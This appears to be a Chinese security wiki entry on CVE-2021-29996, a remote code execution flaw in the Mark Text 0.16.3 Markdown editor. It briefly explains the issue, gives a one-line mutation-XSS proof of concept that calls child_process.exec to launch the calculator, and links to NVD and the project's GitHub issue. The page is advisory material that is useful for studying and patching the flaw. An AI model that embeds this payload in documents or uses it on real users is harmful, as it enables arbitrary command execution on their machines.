menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right --Vulnerability-main chevron_right Mark Text Markdown 编辑器RCE(CVE-2021-29996).md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    Mark Text Markdown 编辑器RCE(CVE-2021-29996).md
    393 B / 2021-05-21 09:14:38
        # Mark Text Markdown 编辑器RCE(CVE-2021-29996)
    
    Mark Text 0.16.3可以使攻击者任意执行命令。通过打开包含变异跨站脚本(XSS)Payload的.md文件,这可能导致远程执行代码(RCE)。
    
    PoC:
    
    ```<style/onload=require('child_process').exec('calc')>
    
    ref:
    
    * https://nvd.nist.gov/vuln/detail/CVE-2021-29996
    * https://github.com/marktext/marktext/issues/2548
    
    links
    file_download